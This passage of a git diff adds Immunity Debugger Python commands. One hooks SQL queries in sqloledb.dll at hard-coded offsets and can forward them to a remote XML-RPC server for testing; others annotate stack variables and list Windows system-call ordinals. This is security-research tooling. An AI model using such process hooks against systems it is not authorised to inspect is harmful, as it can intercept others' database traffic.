+ server = xmlrpclib.ServerProxy("http://%s:%d/"%(self.xmlhost,self.xmlport), allow_none=True)
+ self.imm.Log("Using server: %s:%d"%(self.xmlhost, self.xmlport))
+ using_xml_rpc = True
+ else:
+ server = None
+
+ if using_xml_rpc:
+ #send our xml request to the remove side
+ #if self.filter matches...(stub for now)
+ try:
+ result = server.sendsql(("sqlquery",[sql_query]))
+ except:
+ data=traceback.format_exc()
+ self.imm.Log("Failed to connect to remote server, sorry")
+ self.imm.LogLines("Error was: %s"%data)
+ return
+
+ #Now parse what we got back - a command and list of arguments
+ command, arguments = result
+ if command=="NEWFILTER":
+ #stub
+ self.filter=arguments[0]
+ elif command=="UNHOOK":
+ #stub
+ self.imm.Log("Unhook called")
+ #etc
+ return
+
+def usage(imm):
+ imm.Log("!sqlhooker.py")
+ imm.Log("-u (to uninstall hook)")
+ imm.Log("-s host:port (Server to send XML-RPC data to)")
+
+def main(args):
+
+ imm = Debugger()
+
+ xmlhost = None
+ xmlport = 0
+
+ sql_oledb = imm.getModule("sqloledb.dll")
+
+ if not sql_oledb.isAnalysed():
+ imm.analyseCode(sql_oledb.getCodebase())
+
+ try:
+ opts,argo = getopt.getopt(args, "ius:")
+ except:
+ return usage(imm)
+
+ for o,a in opts:
+ if o == "-u":
+ if hasattr(imm, "removeHook"):
+ imm.removeHook("query")
+ elif hasattr(debugger, "Removehook"):
+ debugger.Removehook("query")
+ else:
+ imm.Log("Could not remove hook - no remove hook function found!")
+ return "Removed hook on SQL function."
+ if o == "-s":
+ xmlhost,xmlport = a.split(":")
+
+
+ # Various versions, we need to match on
+ winxp_pro_sp2 = "2000.085.1117.00 (xpsp_sp2_rtm."
+ win2k3 = "2000.086.3959.00 (srv03_sp2_rtm"
+ win2k = "2000.081.9031.018"
+ win2k_old = "2000.080.0194"
+
+ version = sql_oledb.getVersion()
+
+ sql_base = sql_oledb.getBaseAddress()
+
+ if version == winxp_pro_sp2:
+ offset = 0xF6F5
+ hook_version = "winxp_pro_sp2"
+
+ if version == win2k3:
+ offset = 0x6522
+ hook_version = "win2k3"
+
+ if version == win2k:
+ offset = 0xFA2D
+ hook_version = "win2k"
+
+ if version == win2k_old:
+ offset = 0x4034
+ hook_version = "win2k_old"
+
+ bp_address = sql_base + offset
+
+ # Set a hook
+ hooker = ole_hooker(hook_version,xmlhost,xmlport)
+ hooker.add("query",bp_address)
+
+ return "SQL Hooks in Place. Ready for Test Cases."
diff --git a/1.73/PyCommands/stackvars.py b/1.73/PyCommands/stackvars.py
new file mode 100755
index 0000000..64ede35
--- /dev/null
+++ b/1.73/PyCommands/stackvars.py
@@ -0,0 +1,89 @@
+#!/usr/bin/env python
+"""
+Immunity Debugger stackvars
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.} Debugger API for python
+
+stackvars.py - set comments around the code to follow stack variables size and content.
+
+"""
+
+__VERSION__ = "1.2"
+
+import immlib
+import immutils
+import getopt
+from libstackanalyze import *
+
+DESC="Set comments around the code to follow stack variables size and content"
+
+def usage(imm):
+ imm.Log("!stackvars address_or_expresion [steps_to_decode]")
+ imm.Log("Note: each step represent one call further from the base function")
+
+def main(args):
+ imm = immlib.Debugger()
+
+ if not args:
+ imm.Log("you must define the address of the function to analyze")
+ usage(imm)
+ return "not enough args"
+
+ address = imm.getAddress(args[0])
+ if address < 0:
+ imm.Log("invalid address or expresion")
+ usage(imm)
+ return "address error!"
+
+ if len(args) > 1:
+ steps_after = int(args[1])
+ else:
+ steps_after = 1
+
+ imm.Log("################# Immunity's StackVars ################")
+ imm.Log("Analyzing function %08X - %s..." % (address, imm.decodeAddress(address)))
+
+ flow = FlowAnalyzer(imm, address, steps_after)
+ Calls,varsHits,argsHits,varsSize = flow.getFlowInformation()
+
+
+ imm.Log("----------- code flow -------------")
+ for start,data in Calls.iteritems():
+ imm.Log("function: %s" % imm.decodeAddress(start))
+ for k,v in data.iteritems():
+ imm.Log("from: %s - to: %s - argc: %d - args:" % \
+ (imm.decodeAddress(k), imm.decodeAddress(v[0]), len(v[1])))
+ for kk,vv in v[1].iteritems():
+ imm.Log("arg %d - data: %s" % (kk,str(vv)))
+ imm.setComment(vv['addy'], flow.argInfo(start,k,kk))
+
+ #paint args
+ for start,data in argsHits.iteritems():
+ for const in data:
+ for hit in data[const]:
+ imm.setComment(hit, "using arg[%d] of function: %s" % ((const-4)/4, imm.decodeAddress(start)))
+
+ #paint vars
+ for start,data in varsHits.iteritems():
+ for const in data:
+ try:
+ size = varsSize[start][const]
+ except KeyError:
+ imm.Log("local var size not found: addr: %08X, value: %d" % (start,const))
+ size = "unknown"
+
+ for hit in data[const]:
+ imm.setComment(hit, "Local Var: %X - size: %s" % (const, size))
+
+ imm.Log("functionBegin: %08X" % flow.getFunctionBegin())
+
+ imm.Log("-------- size of variables --------")
+ for start,data in varsSize.iteritems():
+ imm.Log("function: %s" % imm.decodeAddress(start))
+ for const,size in data.iteritems():
+ imm.Log("lvar %X: %d" % (const,size))
+
+ return "Done! see the log for details"
diff --git a/1.73/PyCommands/syscall.py b/1.73/PyCommands/syscall.py
new file mode 100755
index 0000000..c0a8678
--- /dev/null
+++ b/1.73/PyCommands/syscall.py
@@ -0,0 +1,1556 @@
+# (c) Immunity Inc.
+# This is a port of Ero Carrera's script that he wrote for
+# IDAPython. This is the same deal, however it can be easily
+# expanded to track hits to these calls. The beauty of a debugger.
+#
+# http://www.openrce.org/blog/view/1077/Digging_up_system_call_ordinals
+#
+import getopt
+from immlib import *
+
+syscall_table = {'2003':
+ {'0x0103': 'NtSignalAndWaitForSingleObject',
+ '0x009e': 'NtQueryInformationFile',
+ '0x0079': 'NtOpenEventPair',
+ '0x0078': 'NtOpenEvent',
+ '0x00c9': 'NtReplaceKey',
+ '0x0073': 'NtModifyDriverEntry',
+ '0x0072': 'NtModifyBootEntry',
+ '0x0071': 'NtMapViewOfSection',
+ '0x0070': 'NtMapUserPhysicalPagesScatter',
+ '0x0077': 'NtOpenDirectoryObject',
+ '0x0076': 'NtNotifyChangeMultipleKeys',
+ '0x0075': 'NtNotifyChangeKey',
+ '0x0074': 'NtNotifyChangeDirectoryFile',
+ '0x008f': 'NtProtectVirtualMemory',
+ '0x00db': 'NtSetBootEntryOrder',
+ '0x008d': 'NtPrivilegeObjectAuditAlarm',
+ '0x008e': 'NtPrivilegedServiceAuditAlarm',
+ '0x008b': 'NtPowerInformation',
+ '0x008c': 'NtPrivilegeCheck',
+ '0x008a': 'NtPlugPlayControl',
+ '0x00ba': 'NtQueryVirtualMemory',
+ '0x00bb': 'NtQueryVolumeInformationFile',
+ '0x00bc': 'NtQueueApcThread',
+ '0x00bd': 'NtRaiseException',
+ '0x00be': 'NtRaiseHardError',
+ '0x00bf': 'NtReadFile',
+ '0x00da': 'NtSecureConnectPort',
+ '0x00a9': 'NtQueryMutant',
+ '0x00a8': 'NtQueryMultipleValueKey',
+ '0x000f': 'NtAllocateLocallyUniqueId',
+ '0x00a4': 'NtQueryInstallUILanguage',
+ '0x000d': 'NtAlertResumeThread',
+ '0x000e': 'NtAlertThread',
+ '0x000b': 'NtAdjustGroupsToken',
+ '0x000c': 'NtAdjustPrivilegesToken',
+ '0x00a3': 'NtQueryInformationToken',
+ '0x000a': 'NtAddDriverEntry',
+ '0x00df': 'NtSetDefaultHardErrorPort',
+ '0x00dd': 'NtSetContextThread',
+ '0x007c': 'NtOpenJobObject',
+ '0x007b': 'NtOpenIoCompletion',
+ '0x007a': 'NtOpenFile',
+ '0x00de': 'NtSetDebugFilterState',
+ '0x007f': 'NtOpenObjectAuditAlarm',
+ '0x007e': 'NtOpenMutant',
+ '0x007d': 'NtOpenKey',
+ '0x010f': 'NtUnloadDriver',
+ '0x00c3': 'NtRegisterThreadTerminatePort',
+ '0x0120': 'NtYieldExecution',
+ '0x00f9': 'NtSetSystemInformation',
+ '0x0008': 'NtAddAtom',
+ '0x0009': 'NtAddBootEntry',
+ '0x0006': 'NtAccessCheckByTypeResultListAndAuditAlarm',
+ '0x0007': 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle',
+ '0x0004': 'NtAccessCheckByTypeAndAuditAlarm',
+ '0x0005': 'NtAccessCheckByTypeResultList',
+ '0x0002': 'NtAccessCheckAndAuditAlarm',
+ '0x0003': 'NtAccessCheckByType',
+ '0x0000': 'NtAcceptConnectPort',
+ '0x0001': 'NtAccessCheck',
+ '0x0086': 'NtOpenThread',
+ '0x0087': 'NtOpenThreadToken',
+ '0x0084': 'NtOpenSemaphore',
+ '0x0085': 'NtOpenSymbolicLinkObject',
+ '0x0082': 'NtOpenProcessTokenEx',
+ '0x0083': 'NtOpenSection',
+ '0x0080': 'NtOpenProcess',
+ '0x0081': 'NtOpenProcessToken',
+ '0x00b0': 'NtQuerySecurityObject',
+ '0x00b1': 'NtQuerySemaphore',
+ '0x00b2': 'NtQuerySymbolicLinkObject',
+ '0x00b3': 'NtQuerySystemEnvironmentValue',
+ '0x00b4': 'NtQuerySystemEnvironmentValueEx',
+ '0x00b5': 'NtQuerySystemInformation',
+ '0x0088': 'NtOpenThreadTokenEx',
+ '0x0089': 'NtOpenTimer',
+ '0x0109': 'NtTerminateJobObject',
+ '0x00af': 'NtQuerySection',
+ '0x00aa': 'NtQueryObject',
+ '0x010d': 'NtTraceEvent',
+ '0x00f1': 'NtSetIoCompletion',
+ '0x00ac': 'NtQueryOpenSubKeysEx',
+ '0x00ab': 'NtQueryOpenSubKeys',
+ '0x00c7': 'NtRemoveProcessDebug',
+ '0x00b8': 'NtQueryTimerResolution',
+ '0x00c5': 'NtReleaseSemaphore',
+ '0x00c4': 'NtReleaseMutant',
+ '0x0019': 'NtCancelTimer',
+ '0x0018': 'NtCancelIoFile',
+ '0x00c1': 'NtReadRequestData',
+ '0x00b9': 'NtQueryValueKey',
+ '0x0015': 'NtAssignProcessToJobObject',
+ '0x0014': 'NtAreMappedFilesTheSame',
+ '0x0017': 'NtCancelDeviceWakeupRequest',
+ '0x0016': 'NtCallbackReturn',
+ '0x0011': 'NtAllocateUuids',
+ '0x0010': 'NtAllocateUserPhysicalPages',
+ '0x0013': 'NtApphelpCacheControl',
+ '0x0012': 'NtAllocateVirtualMemory',
+ '0x0095': 'NtQueryDefaultLocale',
+ '0x0094': 'NtQueryDebugFilterState',
+ '0x0097': 'NtQueryDirectoryFile',
+ '0x0096': 'NtQueryDefaultUILanguage',
+ '0x0091': 'NtQueryAttributesFile',
+ '0x0090': 'NtPulseEvent',
+ '0x0093': 'NtQueryBootOptions',
+ '0x0092': 'NtQueryBootEntryOrder',
+ '0x002a': 'NtCreateJobSet',
+ '0x002b': 'NtCreateKey',
+ '0x002c': 'NtCreateMailslotFile',
+ '0x002d': 'NtCreateMutant',
+ '0x002e': 'NtCreateNamedPipeFile',
+ '0x002f': 'NtCreatePagingFile',
+ '0x00ae': 'NtQueryQuotaInformationFile',
+ '0x00c2': 'NtReadVirtualMemory',
+ '0x0028': 'NtCreateIoCompletion',
+ '0x0029': 'NtCreateJobObject',
+ '0x00d0': 'NtRequestWaitReplyPort',
+ '0x009f': 'NtQueryInformationJobObject',
+ '0x009a': 'NtQueryEaFile',
+ '0x00a0': 'NtQueryInformationPort',
+ '0x009c': 'NtQueryFullAttributesFile',
+ '0x009b': 'NtQueryEvent',
+ '0x0020': 'NtCompressKey',
+ '0x0021': 'NtConnectPort',
+ '0x0022': 'NtContinue',
+ '0x0023': 'NtCreateDebugObject',
+ '0x0024': 'NtCreateDirectoryObject',
+ '0x0025': 'NtCreateEvent',
+ '0x0026': 'NtCreateEventPair',
+ '0x0027': 'NtCreateFile',
+ '0x00cf': 'NtRequestPort',
+ '0x00ce': 'NtRequestDeviceWakeup',
+ '0x00cd': 'NtReplyWaitReplyPort',
+ '0x00cc': 'NtReplyWaitReceivePortEx',
+ '0x00b6': 'NtQuerySystemTime',
+ '0x00ca': 'NtReplyPort',
+ '0x00e8': 'NtSetInformationDebugObject',
+ '0x001e': 'NtCompareTokens',
+ '0x001d': 'NtCompactKeys',
+ '0x001f': 'NtCompleteConnectPort',
+ '0x001a': 'NtClearEvent',
+ '0x001c': 'NtCloseObjectAuditAlarm',
+ '0x001b': 'NtClose',
+ '0x004b': 'NtEnumerateKey',
+ '0x004c': 'NtEnumerateSystemEnvironmentValuesEx',
+ '0x004a': 'NtEnumerateDriverEntries',
+ '0x004f': 'NtFilterToken',
+ '0x011b': 'NtWaitLowEventPair',
+ '0x004d': 'NtEnumerateValueKey',
+ '0x004e': 'NtExtendSection',
+ '0x0037': 'NtCreateThread',
+ '0x0036': 'NtCreateSymbolicLinkObject',
+ '0x0035': 'NtCreateSemaphore',
+ '0x0034': 'NtCreateSection',
+ '0x0033': 'NtCreateProfile',
+ '0x0032': 'NtCreateProcessEx',
+ '0x0031': 'NtCreateProcess',
+ '0x0030': 'NtCreatePort',
+ '0x0039': 'NtCreateToken',
+ '0x0038': 'NtCreateTimer',
+ '0x00e1': 'NtSetDefaultUILanguage',
+ '0x00e0': 'NtSetDefaultLocale',
+ '0x00e3': 'NtSetEaFile',
+ '0x00e2': 'NtSetDriverEntryOrder',
+ '0x00e5': 'NtSetEventBoostPriority',
+ '0x00e4': 'NtSetEvent',
+ '0x00e7': 'NtSetHighWaitLowEventPair',
+ '0x00e6': 'NtSetHighEventPair',
+ '0x00e9': 'NtSetInformationFile',
+ 'NA': 'NtWriteErrorLogEntry',
+ '0x00f2': 'NtSetLdtEntries',
+ '0x00fd': 'NtSetTimer',
+ '0x00fe': 'NtSetTimerResolution',
+ '0x00ff': 'NtSetUuidSeed',
+ '0x0108': 'NtSystemDebugControl',
+ '0x0102': 'NtShutdownSystem',
+ '0x00fa': 'NtSetSystemPowerState',
+ '0x00fb': 'NtSetSystemTime',
+ '0x00fc': 'NtSetThreadExecutionState',
+ '0x003f': 'NtDeleteBootEntry',
+ '0x003e': 'NtDeleteAtom',
+ '0x003d': 'NtDelayExecution',
+ '0x003c': 'NtDebugContinue',
+ '0x003b': 'NtDebugActiveProcess',
+ '0x003a': 'NtCreateWaitablePort',
+ '0x009d': 'NtQueryInformationAtom',
+ '0x00d1': 'NtRequestWakeupLatency',
+ '0x0042': 'NtDeleteKey',
+ '0x0043': 'NtDeleteObjectAuditAlarm',
+ '0x0040': 'NtDeleteDriverEntry',
+ '0x0041': 'NtDeleteFile',
+ '0x0046': 'NtDisplayString',
+ '0x0047': 'NtDuplicateObject',
+ '0x0044': 'NtDeleteValueKey',
+ '0x0045': 'NtDeviceIoControlFile',
+ '0x00d6': 'NtResumeThread',
+ '0x0048': 'NtDuplicateToken',
+ '0x0049': 'NtEnumerateBootEntries',
+ '0x00a7': 'NtQueryKey',
+ '0x00d7': 'NtSaveKey',
+ '0x00a6': 'NtQueryIoCompletion',
+ '0x00f8': 'NtSetSystemEnvironmentValueEx',
+ '0x00d4': 'NtRestoreKey',
+ '0x0125': 'NtQueryPortInformationProcess',
+ '0x00a1': 'NtQueryInformationProcess',
+ '0x00f6': 'NtSetSecurityObject',
+ '0x0126': 'NtGetCurrentProcessorNumber',
+ '0x0121': 'NtCreateKeyedEvent',
+ '0x00d2': 'NtResetEvent',
+ '0x0123': 'NtReleaseKeyedEvent',
+ '0x0122': 'NtOpenKeyedEvent',
+ '0x00ea': 'NtSetInformationJobObject',
+ '0x00ec': 'NtSetInformationObject',
+ '0x00eb': 'NtSetInformationKey',
+ '0x00ee': 'NtSetInformationThread',
+ '0x00ed': 'NtSetInformationProcess',
+ '0x00f7': 'NtSetSystemEnvironmentValue',
+ '0x00ef': 'NtSetInformationToken',
+ '0x00a2': 'NtQueryInformationThread',
+ '0x00d8': 'NtSaveKeyEx',
+ '0x00f4': 'NtSetLowWaitHighEventPair',
+ '0x010e': 'NtTranslateFilePath',
+ '0x00d9': 'NtSaveMergedKeys',
+ '0x010c': 'NtTestAlert',
+ '0x010b': 'NtTerminateThread',
+ '0x010a': 'NtTerminateProcess',
+ '0x00a5': 'NtQueryIntervalProfile',
+ '0x006d': 'NtMakePermanentObject',
+ '0x006e': 'NtMakeTemporaryObject',
+ '0x006f': 'NtMapUserPhysicalPages',
+ '0x00d3': 'NtResetWriteWatch',
+ '0x006a': 'NtLockProductActivationKeys',
+ '0x006b': 'NtLockRegistryKey',
+ '0x006c': 'NtLockVirtualMemory',
+ '0x0051': 'NtFlushBuffersFile',
+ '0x0050': 'NtFindAtom',
+ '0x0053': 'NtFlushKey',
+ '0x0052': 'NtFlushInstructionCache',
+ '0x0055': 'NtFlushWriteBuffer',
+ '0x0054': 'NtFlushVirtualMemory',
+ '0x0057': 'NtFreeVirtualMemory',
+ '0x0056': 'NtFreeUserPhysicalPages',
+ '0x0059': 'NtGetContextThread',
+ '0x0058': 'NtFsControlFile',
+ '0x00c8': 'NtRenameKey',
+ '0x00f5': 'NtSetQuotaInformationFile',
+ '0x0118': 'NtWaitForMultipleObjects',
+ '0x0119': 'NtWaitForSingleObject',
+ '0x0124': 'NtWaitForKeyedEvent',
+ '0x00d5': 'NtResumeProcess',
+ '0x0110': 'NtUnloadKey',
+ '0x0111': 'NtUnloadKey2',
+ '0x00f3': 'NtSetLowEventPair',
+ '0x0113': 'NtUnlockFile',
+ '0x0114': 'NtUnlockVirtualMemory',
+ '0x0115': 'NtUnmapViewOfSection',
+ '0x0116': 'NtVdmControl',
+ '0x0117': 'NtWaitForDebugEvent',
+ '0x00cb': 'NtReplyWaitReceivePort',
+ '0x005a': 'NtGetDevicePowerState',
+ '0x005c': 'NtGetWriteWatch',
+ '0x005b': 'NtGetPlugPlayEvent',
+ '0x005e': 'NtImpersonateClientOfPort',
+ '0x005d': 'NtImpersonateAnonymousToken',
+ '0x005f': 'NtImpersonateThread',
+ '0x011a': 'NtWaitHighEventPair',
+ '0x0107': 'NtSuspendThread',
+ '0x0106': 'NtSuspendProcess',
+ '0x0105': 'NtStopProfile',
+ '0x0099': 'NtQueryDriverEntryOrder',
+ '0x0068': 'NtLoadKeyEx',
+ '0x0069': 'NtLockFile',
+ '0x0101': 'NtSetVolumeInformationFile',
+ '0x0100': 'NtSetValueKey',
+ '0x0064': 'NtListenPort',
+ '0x0065': 'NtLoadDriver',
+ '0x0066': 'NtLoadKey',
+ '0x0067': 'NtLoadKey2',
+ '0x0060': 'NtInitializeRegistry',
+ '0x0061': 'NtInitiatePowerAction',
+ '0x0062': 'NtIsProcessInJob',
+ '0x0063': 'NtIsSystemResumeAutomatic',
+ '0x00f0': 'NtSetIntervalProfile',
+ '0x00dc': 'NtSetBootOptions',
+ '0x00b7': 'NtQueryTimer',
+ '0x0104': 'NtStartProfile',
+ '0x011e': 'NtWriteRequestData',
+ '0x0098': 'NtQueryDirectoryObject',
+ '0x00c6': 'NtRemoveIoCompletion',
+ '0x00c0': 'NtReadFileScatter',
+ '0x011c': 'NtWriteFile',
+ '0x011d': 'NtWriteFileGather',
+ '0x0112': 'NtUnloadKeyEx',
+ '0x011f': 'NtWriteVirtualMemory',
+ '0x00ad': 'NtQueryPerformanceCounter'},
+'2000': {
+ '0x009e': 'NtQueueApcThread',
+ '0x0079': 'NtQueryInformationAtom',
+ '0x0078': 'NtPulseEvent',
+ '0x00c9': 'NtSetIntervalProfile',
+ '0x0073': 'NtPowerInformation',
+ '0x0072': 'NtPlugPlayControl',
+ '0x0071': 'NtOpenTimer',
+ '0x0070': 'NtOpenThreadToken',
+ '0x0077': 'NtProtectVirtualMemory',
+ '0x0076': 'NtPrivilegeObjectAuditAlarm',
+ '0x0075': 'NtPrivilegedServiceAuditAlarm',
+ '0x0074': 'NtPrivilegeCheck',
+ '0x008f': 'NtQueryOpenSubKeys',
+ '0x00d3': 'NtSetThreadExecutionState',
+ '0x008d': 'NtQueryMutant',
+ '0x008e': 'NtQueryObject',
+ '0x008b': 'NtQueryKey',
+ '0x008c': 'NtQueryMultipleValueKey',
+ '0x008a': 'NtQueryIntervalProfile',
+ '0x00ba': 'NtSetContextThread',
+ '0x00bb': 'NtSetDefaultHardErrorPort',
+ '0x00bc': 'NtSetDefaultLocale',
+ '0x00bd': 'NtSetDefaultUILanguage',
+ '0x00be': 'NtSetEaFile',
+ '0x00bf': 'NtSetEvent',
+ '0x00da': 'NtSignalAndWaitForSingleObject',
+ '0x00a9': 'NtReplaceKey',
+ '0x00a8': 'NtRemoveIoCompletion',
+ '0x000f': 'NtAllocateUuids',
+ '0x00a4': 'NtReadVirtualMemory',
+ '0x000d': 'NtAllocateLocallyUniqueId',
+ '0x000e': 'NtAllocateUserPhysicalPages',
+ '0x000b': 'NtAlertResumeThread',
+ '0x000c': 'NtAlertThread',
+ '0x00a3': 'NtReadRequestData',
+ '0x000a': 'NtAdjustPrivilegesToken',
+ '0x00df': 'NtTerminateJobObject',
+ '0x00dd': 'NtSuspendThread',
+ '0x00b9': 'NtSetIoCompletion',
+ '0x007c': 'NtQueryDefaultUILanguage',
+ '0x007b': 'NtQueryDefaultLocale',
+ '0x007a': 'NtQueryAttributesFile',
+ '0x00de': 'NtSystemDebugControl',
+ '0x007f': 'NtQueryEaFile',
+ '0x007e': 'NtQueryDirectoryObject',
+ '0x007d': 'NtQueryDirectoryFile',
+ '0x00c3': 'NtSetInformationJobObject',
+ '0x0008': 'NtAddAtom',
+ '0x0009': 'NtAdjustGroupsToken',
+ '0x0006': 'NtAccessCheckByTypeResultListAndAuditAlarm',
+ '0x0007': 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle',
+ '0x0004': 'NtAccessCheckByTypeAndAuditAlarm',
+ '0x0005': 'NtAccessCheckByTypeResultList',
+ '0x0002': 'NtAccessCheckAndAuditAlarm',
+ '0x0003': 'NtAccessCheckByType',
+ '0x0000': 'NtAcceptConnectPort',
+ '0x0001': 'NtAccessCheck',
+ '0x0086': 'NtQueryInformationProcess',
+ '0x0087': 'NtQueryInformationThread',
+ '0x0084': 'NtQueryIoCompletion',
+ '0x0085': 'NtQueryInformationPort',
+ '0x0082': 'NtQueryInformationFile',
+ '0x0083': 'NtQueryInformationJobObject',
+ '0x0080': 'NtQueryEvent',
+ '0x0081': 'NtQueryFullAttributesFile',
+ '0x00b0': 'NtRequestWaitReplyPort',
+ '0x00b1': 'NtRequestWakeupLatency',
+ '0x00b2': 'NtResetEvent',
+ '0x00b3': 'NtResetWriteWatch',
+ '0x00b4': 'NtRestoreKey',
+ '0x00b5': 'NtResumeThread',
+ '0x0088': 'NtQueryInformationToken',
+ '0x0089': 'NtQueryInstallUILanguage',
+ '0x00af': 'NtRequestPort',
+ '0x00aa': 'NtReplyPort',
+ '0x00ac': 'NtReplyWaitReceivePortEx',
+ '0x00ab': 'NtReplyWaitReceivePort',
+ '0x00c7': 'NtSetInformationThread',
+ '0x00b8': 'NtSecureConnectPort',
+ '0x00c5': 'NtSetInformationObject',
+ '0x00c4': 'NtSetInformationKey',
+ '0x0019': 'NtCloseObjectAuditAlarm',
+ '0x0018': 'NtClose',
+ '0x00c1': 'NtSetHighWaitLowEventPair',
+ '0x00c0': 'NtSetHighEventPair',
+ '0x0015': 'NtCancelTimer',
+ '0x0014': 'NtCancelIoFile',
+ '0x0017': 'NtClearEvent',
+ '0x0016': 'NtCancelDeviceWakeupRequest',
+ '0x0011': 'NtAreMappedFilesTheSame',
+ '0x0010': 'NtAllocateVirtualMemory',
+ '0x0013': 'NtCallbackReturn',
+ '0x0012': 'NtAssignProcessToJobObject',
+ '0x0095': 'NtQuerySymbolicLinkObject',
+ '0x0094': 'NtQuerySemaphore',
+ '0x0097': 'NtQuerySystemInformation',
+ '0x0096': 'NtQuerySystemEnvironmentValue',
+ '0x0091': 'NtQueryQuotaInformationFile',
+ '0x0090': 'NtQueryPerformanceCounter',
+ '0x0093': 'NtQuerySecurityObject',
+ '0x0092': 'NtQuerySection',
+ '0x002a': 'NtCreateProfile',
+ '0x002b': 'NtCreateSection',
+ '0x002c': 'NtCreateSemaphore',
+ '0x002d': 'NtCreateSymbolicLinkObject',
+ '0x002e': 'NtCreateThread',
+ '0x002f': 'NtCreateTimer',
+ '0x00ae': 'NtRequestDeviceWakeup',
+ '0x00c2': 'NtSetInformationFile',
+ '0x0028': 'NtCreatePort',
+ '0x0029': 'NtCreateProcess',
+ '0x00d0': 'NtSetSystemInformation',
+ '0x009f': 'NtRaiseException',
+ '0x009a': 'NtQueryTimerResolution',
+ '0x00a0': 'NtRaiseHardError',
+ '0x009c': 'NtQueryVirtualMemory',
+ '0x009b': 'NtQueryValueKey',
+ '0x0020': 'NtCreateFile',
+ '0x0021': 'NtCreateIoCompletion',
+ '0x0022': 'NtCreateJobObject',
+ '0x0023': 'NtCreateKey',
+ '0x0024': 'NtCreateMailslotFile',
+ '0x0025': 'NtCreateMutant',
+ '0x0026': 'NtCreateNamedPipeFile',
+ '0x0027': 'NtCreatePagingFile',
+ '0x00cf': 'NtSetSystemEnvironmentValue',
+ '0x00ce': 'NtSetSecurityObject',
+ '0x00cd': 'NtSetQuotaInformationFile',
+ '0x00cc': 'NtSetLowWaitHighEventPair',
+ '0x00b6': 'NtSaveKey',
+ '0x00ca': 'NtSetLdtEntries',
+ '0x00e8': 'NtVdmControl',
+ '0x001e': 'NtCreateEvent',
+ '0x001d': 'NtCreateDirectoryObject',
+ '0x001f': 'NtCreateEventPair',
+ '0x001a': 'NtCompleteConnectPort',
+ '0x001c': 'NtContinue',
+ '0x001b': 'NtConnectPort',
+ '0x004b': 'NtGetPlugPlayEvent',
+ '0x004c': 'NtGetTickCount',
+ '0x004a': 'NtGetDevicePowerState',
+ '0x004f': 'NtImpersonateClientOfPort',
+ '0x004d': 'NtGetWriteWatch',
+ '0x004e': 'NtImpersonateAnonymousToken',
+ '0x0037': 'NtDeleteValueKey',
+ '0x0036': 'NtDeleteObjectAuditAlarm',
+ '0x0035': 'NtDeleteKey',
+ '0x0034': 'NtDeleteFile',
+ '0x0033': 'NtDeleteAtom',
+ '0x0032': 'NtDelayExecution',
+ '0x0031': 'NtCreateWaitablePort',
+ '0x0030': 'NtCreateToken',
+ '0x0039': 'NtDisplayString',
+ '0x0038': 'NtDeviceIoControlFile',
+ '0x00e1': 'NtTerminateThread',
+ '0x00e0': 'NtTerminateProcess',
+ '0x00e3': 'NtUnloadDriver',
+ '0x00e2': 'NtTestAlert',
+ '0x00e5': 'NtUnlockFile',
+ '0x00e4': 'NtUnloadKey',
+ '0x00e7': 'NtUnmapViewOfSection',
+ '0x00e6': 'NtUnlockVirtualMemory',
+ '0x00e9': 'NtWaitForMultipleObjects',
+ 'NA': 'NtWriteErrorLogEntry',
+ '0x003f': 'NtFilterToken',
+ '0x003e': 'NtExtendSection',
+ '0x003d': 'NtEnumerateValueKey',
+ '0x003c': 'NtEnumerateKey',
+ '0x003b': 'NtDuplicateToken',
+ '0x003a': 'NtDuplicateObject',
+ '0x009d': 'NtQueryVolumeInformationFile',
+ '0x00d1': 'NtSetSystemPowerState',
+ '0x0042': 'NtFlushInstructionCache',
+ '0x0043': 'NtFlushKey',
+ '0x0040': 'NtFindAtom',
+ '0x0041': 'NtFlushBuffersFile',
+ '0x0046': 'NtFreeUserPhysicalPages',
+ '0x0047': 'NtFreeVirtualMemory',
+ '0x0044': 'NtFlushVirtualMemory',
+ '0x0045': 'NtFlushWriteBuffer',
+ '0x00d6': 'NtSetUuidSeed',
+ '0x0048': 'NtFsControlFile',
+ '0x0049': 'NtGetContextThread',
+ '0x00a7': 'NtReleaseSemaphore',
+ '0x00d7': 'NtSetValueKey',
+ '0x00a6': 'NtReleaseMutant',
+ '0x00d4': 'NtSetTimer',
+ '0x00f4': 'NtReplyWaitSendChannel',
+ '0x00a1': 'NtReadFile',
+ '0x00f6': 'NtSetContextChannel',
+ '0x00d5': 'NtSetTimerResolution',
+ '0x00f0': 'NtWriteVirtualMemory',
+ '0x00f1': 'NtCreateChannel',
+ '0x00f2': 'NtListenChannel',
+ '0x00f3': 'NtOpenChannel',
+ '0x00ea': 'NtWaitForSingleObject',
+ '0x00ec': 'NtWaitLowEventPair',
+ '0x00eb': 'NtWaitHighEventPair',
+ '0x00ee': 'NtWriteFileGather',
+ '0x00ed': 'NtWriteFile',
+ '0x00f7': 'NtYieldExecution',
+ '0x00ef': 'NtWriteRequestData',
+ '0x00a2': 'NtReadFileScatter',
+ '0x00d8': 'NtSetVolumeInformationFile',
+ '0x00d9': 'NtShutdownSystem',
+ '0x00a5': 'NtRegisterThreadTerminatePort',
+ '0x006d': 'NtOpenSemaphore',
+ '0x006e': 'NtOpenSymbolicLinkObject',
+ '0x006f': 'NtOpenThread',
+ '0x00d2': 'NtSetSystemTime',
+ '0x006a': 'NtOpenProcess',
+ '0x006b': 'NtOpenProcessToken',
+ '0x006c': 'NtOpenSection',
+ '0x0051': 'NtInitializeRegistry',
+ '0x0050': 'NtImpersonateThread',
+ '0x0053': 'NtIsSystemResumeAutomatic',
+ '0x0052': 'NtInitiatePowerAction',
+ '0x0055': 'NtLoadDriver',
+ '0x0054': 'NtListenPort',
+ '0x0057': 'NtLoadKey2',
+ '0x0056': 'NtLoadKey',
+ '0x0059': 'NtLockVirtualMemory',
+ '0x0058': 'NtLockFile',
+ '0x00c8': 'NtSetInformationToken',
+ '0x00f5': 'NtSendWaitReplyChannel',
+ '0x00cb': 'NtSetLowEventPair',
+ '0x005a': 'NtMakeTemporaryObject',
+ '0x005c': 'NtMapUserPhysicalPagesScatter',
+ '0x005b': 'NtMapUserPhysicalPages',
+ '0x005e': 'NtNotifyChangeDirectoryFile',
+ '0x005d': 'NtMapViewOfSection',
+ '0x005f': 'NtNotifyChangeKey',
+ '0x00db': 'NtStartProfile',
+ '0x0099': 'NtQueryTimer',
+ '0x0068': 'NtOpenMutant',
+ '0x0069': 'NtOpenObjectAuditAlarm',
+ '0x0064': 'NtOpenFile',
